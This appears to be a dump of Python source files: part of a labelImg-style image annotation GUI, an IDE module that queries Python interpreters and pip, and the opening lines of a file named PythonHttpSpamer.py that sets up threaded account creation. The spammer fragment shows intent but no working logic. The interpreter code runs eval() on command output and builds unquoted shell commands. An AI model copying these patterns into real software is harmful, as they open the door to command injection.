self.actions.fitWindow.setChecked(False)
self.zoomMode = self.FIT_WIDTH if value else self.MANUAL_ZOOM
self.adjustScale()
def togglePolygons(self, value):
for item, shape in self.itemsToShapes.items():
item.setCheckState(Qt.Checked if value else Qt.Unchecked)
def loadFile(self, filePath=None):
"""Load the specified file, or the last opened file if None."""
self.resetState()
self.canvas.setEnabled(False)
if filePath is None:
filePath = self.settings.get(SETTING_FILENAME)
# Make sure that filePath is a regular python string, rather than QString
filePath = ustr(filePath)
unicodeFilePath = ustr(filePath)
# Tzutalin 20160906 : Add file list and dock to move faster
# Highlight the file item
if unicodeFilePath and self.fileListWidget.count() > 0:
index = self.mImgList.index(unicodeFilePath)
fileWidgetItem = self.fileListWidget.item(index)
fileWidgetItem.setSelected(True)
if unicodeFilePath and os.path.exists(unicodeFilePath):
if LabelFile.isLabelFile(unicodeFilePath):
try:
self.labelFile = LabelFile(unicodeFilePath)
except LabelFileError as e:
self.errorMessage(u'Error opening file',
(u"<p><b>%s</b></p>"
u"<p>Make sure <i>%s</i> is a valid label file.")
% (e, unicodeFilePath))
self.status("Error reading %s" % unicodeFilePath)
return False
self.imageData = self.labelFile.imageData
self.lineColor = QColor(*self.labelFile.lineColor)
self.fillColor = QColor(*self.labelFile.fillColor)
self.canvas.verified = self.labelFile.verified
else:
# Load image:
# read data first and store for saving into label file.
self.imageData = read(unicodeFilePath, None)
self.labelFile = None
self.canvas.verified = False
image = QImage.fromData(self.imageData)
if image.isNull():
self.errorMessage(u'Error opening file',
u"<p>Make sure <i>%s</i> is a valid image file." % unicodeFilePath)
self.status("Error reading %s" % unicodeFilePath)
return False
self.status("Loaded %s" % os.path.basename(unicodeFilePath))
self.image = image
self.filePath = unicodeFilePath
self.canvas.loadPixmap(QPixmap.fromImage(image))
if self.labelFile:
self.loadLabels(self.labelFile.shapes)
self.setClean()
self.canvas.setEnabled(True)
self.adjustScale(initial=True)
self.paintCanvas()
self.addRecentFile(self.filePath)
self.toggleActions(True)
# Label xml file and show bound box according to its filename
# if self.usingPascalVocFormat is True:
if self.defaultSaveDir is not None:
basename = os.path.basename(
os.path.splitext(self.filePath)[0])
xmlPath = os.path.join(self.defaultSaveDir, basename + XML_EXT)
txtPath = os.path.join(self.defaultSaveDir, basename + TXT_EXT)
"""Annotation file priority:
PascalXML > YOLO
"""
if os.path.isfile(xmlPath):
self.loadPascalXMLByFilename(xmlPath)
elif os.path.isfile(txtPath):
self.loadYOLOTXTByFilename(txtPath)
else:
xmlPath = os.path.splitext(filePath)[0] + XML_EXT
txtPath = os.path.splitext(filePath)[0] + TXT_EXT
if os.path.isfile(xmlPath):
self.loadPascalXMLByFilename(xmlPath)
elif os.path.isfile(txtPath):
self.loadYOLOTXTByFilename(txtPath)
self.setWindowTitle(__appname__ + ' ' + filePath)
# Default : select last item if there is at least one item
if self.labelList.count():
self.labelList.setCurrentItem(self.labelList.item(self.labelList.count()-1))
self.labelList.item(self.labelList.count()-1).setSelected(True)
self.canvas.setFocus(True)
return True
return False
def resizeEvent(self, event):
if self.canvas and not self.image.isNull()\
and self.zoomMode != self.MANUAL_ZOOM:
self.adjustScale()
super(MainWindow, self).resizeEvent(event)
def paintCanvas(self):
assert not self.image.isNull(), "cannot paint null image"
self.canvas.scale = 0.01 * self.zoomWidget.value()
self.canvas.adjustSize()
self.canvas.update()
def adjustScale(self, initial=False):
value = self.scalers[self.FIT_WINDOW if initial else self.zoomMode]()
self.zoomWidget.setValue(int(100 * value))
def scaleFitWindow(self):
"""Figure out the size of the pixmap in order to fit the main widget."""
e = 2.0 # So that no scrollbars are generated.
w1 = self.centralWidget().width() - e
h1 = self.centralWidget().height() - e
a1 = w1 / h1
# Calculate a new scale value based on the pixmap's aspect ratio.
w2 = self.canvas.pixmap.width() - 0.0
h2 = self.canvas.pixmap.height() - 0.0
a2 = w2 / h2
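# If the pixmap is proportionally wider than the widget, width is the limiting dimension; otherwise fit by height.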
return w1 / w2 if a2 >= a1 else h1 / h2
def scaleFitWidth(self):
# The epsilon does not seem to work too well here.
w = self.centralWidget().width() - 2.0
return w / self.canvas.pixmap.width()
def closeEvent(self, event):
if not self.mayContinue():
event.ignore()
settings = self.settings
# If images were loaded from a directory, don't reload a single file at the beginning
if self.dirname is None:
settings[SETTING_FILENAME] = self.filePath if self.filePath else ''
else:
settings[SETTING_FILENAME] = ''
settings[SETTING_WIN_SIZE] = self.size()
settings[SETTING_WIN_POSE] = self.pos()
settings[SETTING_WIN_STATE] = self.saveState()
settings[SETTING_LINE_COLOR] = self.lineColor
settings[SETTING_FILL_COLOR] = self.fillColor
settings[SETTING_RECENT_FILES] = self.recentFiles
settings[SETTING_ADVANCE_MODE] = not self._beginner
if self.defaultSaveDir and os.path.exists(self.defaultSaveDir):
settings[SETTING_SAVE_DIR] = ustr(self.defaultSaveDir)
else:
settings[SETTING_SAVE_DIR] = ""
if self.lastOpenDir and os.path.exists(self.lastOpenDir):
settings[SETTING_LAST_OPEN_DIR] = self.lastOpenDir
else:
settings[SETTING_LAST_OPEN_DIR] = ""
settings[SETTING_AUTO_SAVE] = self.autoSaving.isChecked()
settings[SETTING_SINGLE_CLASS] = self.singleClassMode.isChecked()
settings[SETTING_PAINT_LABEL] = self.paintLabelsOption.isChecked()
settings.save()
## User Dialogs ##
def loadRecent(self, filename):
if self.mayContinue():
self.loadFile(filename)
def scanAllImages(self, folderPath):
extensions = ['.%s' % fmt.data().decode("ascii").lower() for fmt in QImageReader.supportedImageFormats()]
images = []
for root, dirs, files in os.walk(folderPath):
for file in files:
if file.lower().endswith(tuple(extensions)):
relativePath = os.path.join(root, file)
path = ustr(os.path.abspath(relativePath))
images.append(path)
images.sort(key=lambda x: x.lower())
return images
def changeSavedirDialog(self, _value=False):
if self.defaultSaveDir is not None:
path = ustr(self.defaultSaveDir)
else:
path = '.'
dirpath = ustr(QFileDialog.getExistingDirectory(self,
'%s - Save annotations to the directory' % __appname__, path, QFileDialog.ShowDirsOnly
| QFileDialog.DontResolveSymlinks))
if dirpath is not None and len(dirpath) > 1:
self.defaultSaveDir = dirpath
self.statusBar().showMessage('Changed save folder. Annotations will be saved to %s' %
self.defaultSaveDir)
self.statusBar().show()
def openAnnotationDialog(self, _value=False):
if self.filePath is None:
self.statusBar().showMessage('Please select image first')
self.statusBar().show()
return
path = os.path.dirname(ustr(self.filePath))\
if self.filePath else '.'
if self.usingPascalVocFormat:
filters = "Open Annotation XML file (%s)" % ' '.join(['*.xml'])
filename = ustr(QFileDialog.getOpenFileName(self,'%s - Choose an XML file' % __appname__, path, filters))
if filename:
if isinstance(filename, (tuple, list)):
filename = filename[0]
self.loadPascalXMLByFilename(filename)
def openDirDialog(self, _value=False, dirpath=None):
if not self.mayContinue():
return
defaultOpenDirPath = dirpath if dirpath else '.'
if self.lastOpenDir and os.path.exists(self.lastOpenDir):
defaultOpenDirPath = self.lastOpenDir
else:
defaultOpenDirPath = os.path.dirname(self.filePath) if self.filePath else '.'
targetDirPath = ustr(QFileDialog.getExistingDirectory(self,
'%s - Open Directory' % __appname__, defaultOpenDirPath,
QFileDialog.ShowDirsOnly | QFileDialog.DontResolveSymlinks))
self.importDirImages(targetDirPath)
def importDirImages(self, dirpath):
if not self.mayContinue() or not dirpath:
return
self.lastOpenDir = dirpath
self.dirname = dirpath
self.filePath = None
self.fileListWidget.clear()
self.mImgList = self.scanAllImages(dirpath)
self.openNextImg()
for imgPath in self.mImgList:
item = QListWidgetItem(imgPath)
self.fileListWidget.addItem(item)
self.classListWidget.clear()
for index, className in enumerate(self.labelHist):
item = QListWidgetItem("%d: %s" % (index, className))
self.classListWidget.addItem(item)
def verifyImg(self, _value=False):
# Toggle the verified flag of the current annotation file
if self.filePath is not None:
try:
self.labelFile.toggleVerify()
except AttributeError:
# If the label file does not exist yet, create it and
# re-save it with the verified attribute.
self.saveFile()
if self.labelFile is not None:
self.labelFile.toggleVerify()
else:
return
self.canvas.verified = self.labelFile.verified
self.paintCanvas()
self.saveFile()
def openPrevImg(self, _value=False):
# Proceed to the previous image without a dialog when auto-saving is enabled
if self.autoSaving.isChecked():
if self.defaultSaveDir is not None:
if self.dirty is True:
self.saveFile()
else:
self.changeSavedirDialog()
return
if not self.mayContinue():
return
if len(self.mImgList) <= 0:
return
if self.filePath is None:
return
currIndex = self.mImgList.index(self.filePath)
if currIndex - 1 >= 0:
filename = self.mImgList[currIndex - 1]
if filename:
self.loadFile(filename)
def openNextImg(self, _value=False):
# Proceed to the next image without a dialog when auto-saving is enabled
if self.autoSaving.isChecked():
if self.defaultSaveDir is not None:
if self.dirty is True:
self.saveFile()
else:
self.changeSavedirDialog()
return
if not self.mayContinue():
return
if len(self.mImgList) <= 0:
return
filename = None
if self.filePath is None:
filename = self.mImgList[0]
else:
currIndex = self.mImgList.index(self.filePath)
if currIndex + 1 < len(self.mImgList):
filename = self.mImgList[currIndex + 1]
if filename:
self.loadFile(filename)
self.yoloConfRefresh()
def nextBox(self):
if (self.labelList.count()):
current = -1
for i in range(self.labelList.count()):
if (self.labelList.item(i).isSelected()):
break
current = i
if ((current != -1) and (current < (self.labelList.count() - 1))):
self.labelList.setCurrentItem(self.labelList.item(current + 1))
self.labelList.item(current + 1).setSelected(True)
else:
self.labelList.setCurrentItem(self.labelList.item(0))
self.labelList.item(0).setSelected(True)
self.labelSelectionChanged()
def backBox(self):
if (self.labelList.count()):
current = -1
for i in range(self.labelList.count()):
if (self.labelList.item(i).isSelected()):
break
current = i
if ((current != -1) and (current > 0)):
self.labelList.setCurrentItem(self.labelList.item(current - 1))
self.labelList.item(current - 1).setSelected(True)
else:
self.labelList.setCurrentItem(self.labelList.item(self.labelList.count() - 1))
self.labelList.item(self.labelList.count() - 1).setSelected(True)
self.labelSelectionChanged()
def openFile(self, _value=False):
if not self.mayContinue():
return
path = os.path.dirname(ustr(self.filePath)) if self.filePath else '.'
formats = ['*.%s' % fmt.data().decode("ascii").lower() for fmt in QImageReader.supportedImageFormats()]
filters = "Image & Label files (%s)" % ' '.join(formats + ['*%s' % LabelFile.suffix])
filename = QFileDialog.getOpenFileName(self, '%s - Choose Image or Label file' % __appname__, path, filters)
if filename:
if isinstance(filename, (tuple, list)):
filename = filename[0]
self.loadFile(filename)
def saveFile(self, _value=False):
if self.defaultSaveDir is not None and len(ustr(self.defaultSaveDir)):
if self.filePath:
imgFileName = os.path.basename(self.filePath)
savedFileName = os.path.splitext(imgFileName)[0]
savedPath = os.path.join(ustr(self.defaultSaveDir), savedFileName)
self._saveFile(savedPath)
else:
imgFileDir = os.path.dirname(self.filePath)
imgFileName = os.path.basename(self.filePath)
savedFileName = os.path.splitext(imgFileName)[0]
savedPath = os.path.join(imgFileDir, savedFileName)
self._saveFile(savedPath if self.labelFile
else self.saveFileDialog())
def saveFileAs(self, _value=False):
assert not self.image.isNull(), "cannot save empty image"
self._saveFile(self.saveFileDialog())
def saveFileDialog(self):
caption = '%s - Choose File' % __appname__
filters = 'File (*%s)' % LabelFile.suffix
openDialogPath = self.currentPath()
dlg = QFileDialog(self, caption, openDialogPath, filters)
dlg.setDefaultSuffix(LabelFile.suffix[1:])
dlg.setAcceptMode(QFileDialog.AcceptSave)
filenameWithoutExtension = os.path.splitext(self.filePath)[0]
dlg.selectFile(filenameWithoutExtension)
dlg.setOption(QFileDialog.DontUseNativeDialog, False)
if dlg.exec_():
fullFilePath = ustr(dlg.selectedFiles()[0])
return os.path.splitext(fullFilePath)[0] # Return file path without the extension.
return ''
def _saveFile(self, annotationFilePath):
if annotationFilePath and self.saveLabels(annotationFilePath):
self.setClean()
self.statusBar().showMessage('Saved to %s' % annotationFilePath)
self.statusBar().show()
def closeFile(self, _value=False):
if not self.mayContinue():
return
self.resetState()
self.setClean()
self.toggleActions(False)
self.canvas.setEnabled(False)
self.actions.saveAs.setEnabled(False)
def resetAll(self):
self.settings.reset()
self.close()
proc = QProcess()
proc.startDetached(os.path.abspath(__file__))
def mayContinue(self):
return not (self.dirty and not self.discardChangesDialog())
def discardChangesDialog(self):
yes, no = QMessageBox.Yes, QMessageBox.No
msg = u'You have unsaved changes, proceed anyway?'
return yes == QMessageBox.warning(self, u'Attention', msg, yes | no)
def errorMessage(self, title, message):
return QMessageBox.critical(self, title,
'<p><b>%s</b></p>%s' % (title, message))
def currentPath(self):
return os.path.dirname(self.filePath) if self.filePath else '.'
def chooseColor1(self):
color = self.colorDialog.getColor(self.lineColor, u'Choose line color',
default=DEFAULT_LINE_COLOR)
if color:
self.lineColor = color
Shape.line_color = color
self.canvas.setDrawingColor(color)
self.canvas.update()
self.setDirty()
def deleteSelectedShape(self):
self.remLabel(self.canvas.deleteSelected())
self.setDirty()
if self.noShapes():
for action in self.actions.onShapesPresent:
action.setEnabled(False)
def chshapeLineColor(self):
color = self.colorDialog.getColor(self.lineColor, u'Choose line color',
default=DEFAULT_LINE_COLOR)
if color:
self.canvas.selectedShape.line_color = color
self.canvas.update()
self.setDirty()
def chshapeFillColor(self):
color = self.colorDialog.getColor(self.fillColor, u'Choose fill color',
default=DEFAULT_FILL_COLOR)
if color:
self.canvas.selectedShape.fill_color = color
self.canvas.update()
self.setDirty()
def copyShape(self):
self.canvas.endMove(copy=True)
self.addLabel(self.canvas.selectedShape)
self.setDirty()
def moveShape(self):
self.canvas.endMove(copy=False)
self.setDirty()
def loadPredefinedClasses(self, predefClassesFile):
if os.path.exists(predefClassesFile):
with codecs.open(predefClassesFile, 'r', 'utf8') as f:
for line in f:
line = line.strip()
if self.labelHist is None:
self.labelHist = [line]
else:
self.labelHist.append(line)
def loadPascalXMLByFilename(self, xmlPath):
if self.filePath is None:
return
if not os.path.isfile(xmlPath):
return
self.set_format(FORMAT_PASCALVOC)
tVocParseReader = PascalVocReader(xmlPath)
shapes = tVocParseReader.getShapes()
self.loadLabels(shapes)
self.canvas.verified = tVocParseReader.verified
def loadYOLOTXTByFilename(self, txtPath):
if self.filePath is None:
return
if not os.path.isfile(txtPath):
return
self.set_format(FORMAT_YOLO)
tYoloParseReader = YoloReader(txtPath, self.image)
shapes = tYoloParseReader.getShapes()
print (shapes)
self.loadLabels(shapes)
self.canvas.verified = tYoloParseReader.verified
def togglePaintLabelsOption(self):
paintLabelsOptionChecked = self.paintLabelsOption.isChecked()
for shape in self.canvas.shapes:
shape.paintLabel = paintLabelsOptionChecked
def inverted(color):
return QColor(*[255 - v for v in color.getRgb()])
def read(filename, default=None):
try:
with open(filename, 'rb') as f:
return f.read()
except (IOError, OSError):
return default
def get_main_app(argv=[]):
"""
Standard boilerplate Qt application code.
Do everything but app.exec_() -- so that we can test the application in one thread
"""
app = QApplication(argv)
app.setApplicationName(__appname__)
app.setWindowIcon(newIcon("app"))
# Tzutalin 201705+: Accept extra arguments to change predefined class file
# Usage : labelImg.py image predefClassFile saveDir
win = MainWindow(argv[1] if len(argv) >= 2 else None,
argv[2] if len(argv) >= 3 else os.path.join(
os.path.dirname(sys.argv[0]),
'data', 'predefined_classes.txt'),
argv[3] if len(argv) >= 4 else None)
win.show()
return app, win
def main():
'''construct main app and run it'''
app, _win = get_main_app(sys.argv)
return app.exec_()
if __name__ == '__main__':
sys.exit(main())
|
interpreter.py | # -*- coding: utf-8 -*-
#-------------------------------------------------------------------------------
# Name: Interpreter.py
# Purpose:
#
# Author: wukan
#
# Created: 2019-01-10
# Copyright: (c) wukan 2019
# Licence: GPL-3.0
#-------------------------------------------------------------------------------
from noval import GetApp
import os
import locale
import noval.util.apputils as apputils
import noval.util.strutils as strutils
import six.moves.builtins as builtins
import threading
from noval.util import utils
import glob
import sys
try:
import cStringIO
except ImportError:
import io as cStringIO
import py_compile
import noval.util.fileutils as fileutils
from noval.executable import Executable,UNKNOWN_VERSION_NAME
#this class must inherit from object,
#otherwise property definitions are not valid on Python 2 (old-style classes)
class PythonEnvironment(object):
def __init__(self):
self._include_system_environ = True
self.environ = {}
def Exist(self,key):
return key in self.environ
def GetEnviron(self):
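# Merge custom variables with the system environment; os.environ is applied last, so system values win on key collisions.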
environ = {}
environ.update(self.environ)
if self._include_system_environ:
environ.update(os.environ)
return environ
def SetEnviron(self,dct):
self.environ = {}
for key in dct:
self.environ[str(key)] = str(dct[key])
#this environment variable forces unbuffered stdout and stderr
#the value must be a string, not an int: os.environ on Linux rejects non-string values
self.environ['PYTHONUNBUFFERED'] = '1'
@property
def IncludeSystemEnviron(self):
return self._include_system_environ
@IncludeSystemEnviron.setter
def IncludeSystemEnviron(self,v):
self._include_system_environ = v
def __next__(self):
'''
Python 3 iteration method
'''
return self.next()
def __iter__(self):
self.iter = iter(self.environ)
return self
def next(self):
'''
Python 2 iteration method
'''
return builtins.next(self.iter)
def GetCount(self):
return len(self.environ)
def __getitem__(self,name):
return self.environ[name]
class PythonPackage(object):
def __init__(self,**kwargs):
for key in kwargs:
# normalize lowercase keys to the capitalized attribute names
if key == 'name':
attr = 'Name'
elif key == 'version':
attr = 'Version'
else:
attr = key
setattr(self,attr,kwargs[key])
class BuiltinPythonInterpreter(Executable):
def __init__(self,name,executable_path,id=None,is_builtin = True):
super(BuiltinPythonInterpreter,self).__init__(name,executable_path)
self._is_builtin = is_builtin
if id is None:
self._id = GetApp().GetInterpreterManager().GenerateId()
else:
self._id = int(id)
self._is_default = False
self._sys_path_list = sys.path
self._python_path_list = []
#full Python version string (major.minor.micro)
self._version = ".".join([str(sys.version_info.major),str(sys.version_info.minor),str(sys.version_info.micro)])
#short Python version, containing only major and minor
self._minor_version = ".".join([str(sys.version_info.major),str(sys.version_info.minor)])
self._builtins = list(sys.builtin_module_names)
self.Environ = PythonEnvironment()
self._packages = {}
self._help_path = ""
#builtin module name which python2 is __builtin__ and python3 is builtins
self._builtin_module_name = builtins.__name__
@property
def IsBuiltIn(self):
return self._is_builtin
@property
def MinorVersion(self):
return self._minor_version
@property
def Version(self):
return self._version
@property
def HelpPath(self):
return self._help_path
@HelpPath.setter
def HelpPath(self,help_path):
self._help_path = help_path
@property
def Default(self):
return self._is_default
@Default.setter
def Default(self,is_default):
self._is_default = is_default
@property
def SysPathList(self):
return self._sys_path_list
@property
def PythonPathList(self):
return self._python_path_list
@PythonPathList.setter
def PythonPathList(self,path_list):
self._python_path_list = path_list
@property
def Builtins(self):
return self._builtins
@property
def Id(self):
return self._id
@property
def BuiltinModuleName(self):
return self._builtin_module_name
@property
def Packages(self):
return self._packages
@Packages.setter
def Packages(self,packages):
self._packages = packages
def LoadPackages(self,ui_panel,force):
ui_panel.LoadPackageEnd(self)
@property
def IsLoadingPackage(self):
return False
def SetInterpreter(self,**kwargs):
self._version = kwargs.get('version')
if self._version == UNKNOWN_VERSION_NAME:
return
self._minor_version = kwargs.get('minor_version','')
self._builtins = kwargs.get('builtins')
self._sys_path_list = kwargs.get('sys_path_list')
python_path_list = kwargs.get('python_path_list')
self._python_path_list = [pythonpath for pythonpath in python_path_list if str(pythonpath) != '']
self._is_builtin = kwargs.get('is_builtin')
def IsV2(self):
return True
def IsV3(self):
return False
@property
def Analysing(self):
return False
@property
def IsValidInterpreter(self):
return True
def CheckSyntax(self,script_path):
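# Temporarily capture stderr while py_compile compiles the script; any captured output
# indicates a syntax error, which is parsed below for a line number and message.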
origin_stderr = sys.stderr
sys.stderr = cStringIO.StringIO()
py_compile.compile(script_path)
output = sys.stderr.getvalue().strip()
sys.stderr = origin_stderr
if 0 == len(output):
return True,-1,''
lower_output = output.lower()
lines = output.splitlines()
fileBegin = lines[0].find("File \"")
fileEnd = lines[0].find("\", line ")
if -1 != lower_output.find('permission denied:'):
line = lines[-1]
pos = line.find(']')
msg = line[pos+1:].replace("'","").strip()
msg += ",Perhaps you need to delete it first!"
return False,-1,msg
elif fileBegin != -1 and fileEnd != -1:
lineNum = int(lines[0][fileEnd + 8:].strip())
return False,lineNum,'\n'.join(lines[1:])
i = lines[0].find('(')
j = lines[0].find(')')
msg = lines[0][0:i].strip()
lineNum = int(lines[0][i+1:j].split()[-1])
return False,lineNum,msg
def IsPackageExist(self,package_name):
if package_name in self.Packages:
return True
return False
def LoaPackagesFromDict(self,package_dct):
return {}
def DumpPackages(self):
return {}
def GetExedirs(self):
return [self.InstallPath,]
def IsVirtual(self):
return False
def GetPythonLibPath(self):
return None
class PythonInterpreter(BuiltinPythonInterpreter):
CONSOLE_EXECUTABLE_NAME = "python.exe"
WINDOW_EXECUTABLE_NAME = "pythonw.exe"
def __init__(self,name,executable_path,id=None,is_valid_interpreter = False):
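# On Windows, pair python.exe (console) with pythonw.exe (windowed) so both launch modes
# are available; the console binary becomes the canonical executable path.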
if apputils.is_windows():
if os.path.basename(executable_path) == PythonInterpreter.WINDOW_EXECUTABLE_NAME:
self._window_path = executable_path
console_path = os.path.join(os.path.dirname(executable_path),PythonInterpreter.CONSOLE_EXECUTABLE_NAME)
self._console_path = console_path
executable_path = self._console_path
elif os.path.basename(executable_path) == PythonInterpreter.CONSOLE_EXECUTABLE_NAME:
self._console_path = executable_path
window_path = os.path.join(os.path.dirname(executable_path),PythonInterpreter.WINDOW_EXECUTABLE_NAME)
self._window_path = window_path
super(PythonInterpreter,self).__init__(name,executable_path,id,False)
self._is_valid_interpreter = is_valid_interpreter
self._version = UNKNOWN_VERSION_NAME
self._is_analysing = False
self._is_analysed = False
self._is_loading_package = False
#short Python version, containing only major and minor
self._minor_version = ''
if not is_valid_interpreter:
#get the full Python version
self.GetVersion()
#get the short Python version
self.GetMinorVersion()
if not is_valid_interpreter and self._is_valid_interpreter:
self.GetSysPathList()
self.GetBuiltins()
def IsVirtual(self):
'''
Whether this interpreter belongs to a virtual environment
'''
pdir = os.path.dirname(self.Path)
return (
os.path.exists(os.path.join(pdir, "activate"))
or os.path.exists(os.path.join(pdir, "activate.bat"))
)
def GetMinorVersion(self):
if not self._minor_version:
cmd ="\"%s\" -c \"import sys;print(str(sys.version_info.major) + '.' + str(sys.version_info.minor))\"" % self.Path
output = utils.GetCommandOutput(cmd)
self._minor_version = output.strip()
def GetVersion(self):
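# "python -V" prints to stderr on Python 2 but to stdout on Python 3; the boolean passed
# to GetCommandOutput presumably selects which stream is read, so both are tried.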
output = utils.GetCommandOutput("%s -V" % strutils.emphasis_path(self.Path),True).strip().lower()
version_flag = "python "
if output.find(version_flag) == -1:
output = utils.GetCommandOutput("%s -V" % strutils.emphasis_path(self.Path),False).strip().lower()
if output.find(version_flag) == -1:
utils.get_logger().error("get version stdout output is *****%s****",output)
return
self._version = output.replace(version_flag,"").strip()
#Anaconda reports its version as "Python 3.6.5 :: Anaconda, Inc.", so extract the real version number from it
if self._version.find(':') != -1:
self._version = self._version[0:self._version.find(':')].strip()
self._is_valid_interpreter = True
self.SetBuiltinName()
def IsV27(self):
versions = self.Version.split('.')
if int(versions[0]) == 2 and int(versions[1]) == 7:
return True
return False
def IsV26(self):
versions = self.Version.split('.')
if int(versions[0]) == 2 and int(versions[1]) == 6:
return True
return False
def IsV2(self):
versions = self.Version.split('.')
if not versions[0].isdigit():
return False
if int(versions[0]) == 2:
return True
return False
def IsV3(self):
versions = self.Version.split('.')
if not versions[0].isdigit():
return False
if int(versions[0]) >= 3:
return True
return False
def CheckSyntax(self,script_path):
check_cmd ="\"%s\" -c \"import py_compile;py_compile.compile(r'%s')\"" % (self.Path,script_path)
if utils.is_py2():
sys_encoding = locale.getdefaultlocale()[1]
check_cmd = check_cmd.encode(sys_encoding)
output = utils.GetCommandOutput(check_cmd,True).strip()
if 0 == len(output):
return True,-1,''
lower_output = output.lower()
lines = output.splitlines()
fileBegin = lines[0].find("File \"")
fileEnd = lines[0].find("\", line ")
if -1 != lower_output.find('permission denied:'):
line = lines[-1]
pos = line.find(']')
msg = line[pos+1:].replace("'","").strip()
msg += ",Perhaps you need to delete it first!"
return False,-1,msg
elif fileBegin != -1 and fileEnd != -1:
lineNum = int(lines[0][fileEnd + 8:].strip())
return False,lineNum,'\n'.join(lines[1:])
if self.IsV26():
'''
parse such error text:
Sorry: IndentationError: ('unexpected indent', ('D:\\env\\Noval\\noval\\test\\run_test_input.py', 106, 16, ' ddd\n'))
'''
i = lines[0].find(", ('")
j = lines[0].find(')')
msg = lines[0][0:i].strip()
lineNum = int(lines[0][i+1:j].split(',')[1].strip())
else:
'''
parse such error text:
Sorry: IndentationError: unexpected indent (run_test_input.py, line 106)
'''
i = lines[0].find('(')
j = lines[0].find(')')
msg = lines[0][0:i].strip()
lineNum = int(lines[0][i+1:j].split()[-1])
return False,lineNum,msg
@property
def ConsolePath(self):
return self._console_path
@property
def WindowPath(self):
return self._window_path
@property
def IsValidInterpreter(self):
return self._is_valid_interpreter
def GetSysPathList(self):
if self.IsV2():
run_cmd ="%s -c \"import sys;print sys.path\"" % (strutils.emphasis_path(self.Path))
elif self.IsV3():
run_cmd ="%s -c \"import sys;print (sys.path)\"" % (strutils.emphasis_path(self.Path))
else:
utils.get_logger().warn("interpreter path %s could not get python version" % self.Path)
self._is_valid_interpreter = False
return
output = utils.GetCommandOutput(run_cmd).strip()
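# The command prints a Python list literal; eval() turns it back into a list (the interpreter's own output is trusted here)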
lst = eval(output)
self._sys_path_list = lst
def GetBuiltins(self):
if not self._is_valid_interpreter :
return
if self.IsV2():
run_cmd ="%s -c \"import sys;print sys.builtin_module_names\"" % (strutils.emphasis_path(self.Path))
elif self.IsV3():
run_cmd ="%s -c \"import sys;print (sys.builtin_module_names)\"" % (strutils.emphasis_path(self.Path))
output = utils.GetCommandOutput(run_cmd).strip()
lst = eval(output)
#should convert tuple type to list
self._builtins = list(lst)
def GetPythonLibPath(self):
'''
Get the global site-packages path of the interpreter installation
'''
if self.IsV2():
cmd = "%s -c \"from distutils.sysconfig import get_python_lib; print get_python_lib()\"" % \
(strutils.emphasis_path(self.Path),)
elif self.IsV3():
cmd = "%s -c \"from distutils.sysconfig import get_python_lib; print (get_python_lib())\"" % \
(strutils.emphasis_path(self.Path),)
python_lib_path = utils.GetCommandOutput(cmd).strip()
return python_lib_path
def GetUserLibPath(self):
'''
Get the user site-packages path used when installing packages with the --user flag
'''
command = "%s -c \"import site;print(site.getusersitepackages())\"" %(strutils.emphasis_path(self.Path))
user_lib_path = utils.GetCommandOutput(command).strip()
return user_lib_path
@property
def Analysing(self):
return self._is_analysing
@Analysing.setter
def Analysing(self,is_analysing):
self._is_analysing = is_analysing
@property
def IsAnalysed(self):
return self._is_analysed
@IsAnalysed.setter
def IsAnalysed(self,is_analysed):
self._is_analysed = is_analysed
def GetPipPath(self):
if apputils.is_windows():
pip_name = "pip.exe"
pip3_name = "pip3.exe"
else:
pip_name = "pip"
pip3_name = "pip3"
python_location = os.path.dirname(self.Path)
pip_path_list = []
#linux python3 pip tool name is pip3
if self.IsV2() or apputils.is_windows():
pip_path_list = [os.path.join(python_location,"Scripts",pip_name),os.path.join(python_location,pip_name)]
if self.IsV3():
#py3 may get pip3 as the pip tool
pip_path_list.extend([os.path.join(python_location,"Scripts",pip3_name),os.path.join(python_location,pip3_name)])
for pip_path in pip_path_list:
if os.path.exists(pip_path):
return pip_path
return None
def GetDocPath(self):
if self._help_path == "":
if apputils.is_windows():
python_location = os.path.dirname(self.Path)
doc_location = os.path.join(python_location,"Doc")
file_list = glob.glob(os.path.join(doc_location,"*.chm"))
if len(file_list) > 0 :
self._help_path = file_list[0]
def LoadPackages(self,ui_panel,force):
if (not self._is_loading_package and 0 == len(self._packages)) or force:
t = threading.Thread(target=self.LoadPackageList,args=(ui_panel,))
t.start()
def LoadPackageList(self,ui_panel):
#clear all packages first
self._packages = {}
self._is_loading_package = True
pip_path = self.GetPipPath()
if pip_path is not None:
command = "%s list" % strutils.emphasis_path(pip_path)
output = utils.GetCommandOutput(command)
for line in output.split('\n'):
if line.strip() == "":
continue
name,raw_version = line.split()[0:2]
#filter output lines like
'''
Package Version
---------------------------- ---------
'''
if raw_version.startswith("-----") or raw_version.strip() == "Version":
continue
version = raw_version.replace("(","").replace(")","")
python_package = PythonPackage(**{'Name':name,'Version':version})
self._packages[name] = python_package
if self._is_loading_package:
ui_panel.LoadPackageEnd(self)
self._is_loading_package = False
else:
utils.get_logger().warn("user stop loading interpreter %s package....." % self.Name)
@property
def IsLoadingPackage(self):
return self._is_loading_package
def StopLoadingPackage(self):
self._is_loading_package = False
def GetInstallPackage(self,package_name):
command = "%s show %s" % (strutils.emphasis_path(self.GetPipPath()),package_name)
utils.get_logger().info("pip show command is %s",command)
output = utils.GetCommandOutput(command)
if output.strip() == "":
return None
name = package_name
version = 'Unknown'
name_flag = 'Name:'
ver_flag = 'Version:'
location = None
for line in output.splitlines():
if line.find(name_flag) != -1:
name = line.replace(name_flag,"").strip()
elif line.find(ver_flag) != -1:
version = line.replace(ver_flag,"").strip()
#get the package install location; on Linux this is used to decide whether uninstalling needs root privileges
elif line.find('Location:') != -1:
location = line.replace('Location:',"").strip()
python_package = PythonPackage(**{'Name':name,'Version':version,'Location':location})
return python_package
def DumpPackages(self):
packages = {}
for name in self._packages:
package = self._packages[name]
dct = {
'Name':package.Name,
'Version':package.Version
}
packages[name] = dct
return packages
def GetExedirs(self):
result = []
main_scripts = os.path.join(self.InstallPath, "Scripts")
if os.path.isdir(main_scripts) and main_scripts not in result:
result.append(main_scripts)
if os.path.dirname(self.Path) not in result:
result.append(os.path.dirname(self.Path))
return result
def SetInterpreter(self,**kwargs):
BuiltinPythonInterpreter.SetInterpreter(self,**kwargs)
self.SetBuiltinName()
def SetBuiltinName(self):
#builtin module name which python2 is __builtin__ and python3 is builtins
if self.IsV3():
self._builtin_module_name = "builtins"
elif self.IsV2():
self._builtin_module_name = "__builtin__" |
PythonHttpSpamer.py | import sys
import argparse
import requests
from bs4 import BeautifulSoup
from queue import Queue
from threading import Thread
# set up some global variables
newAccountNameTemplate = "tester-"
num_threads = 4
jobsQueue = Queue()
resultQueue = Queue()
startIndex = 1
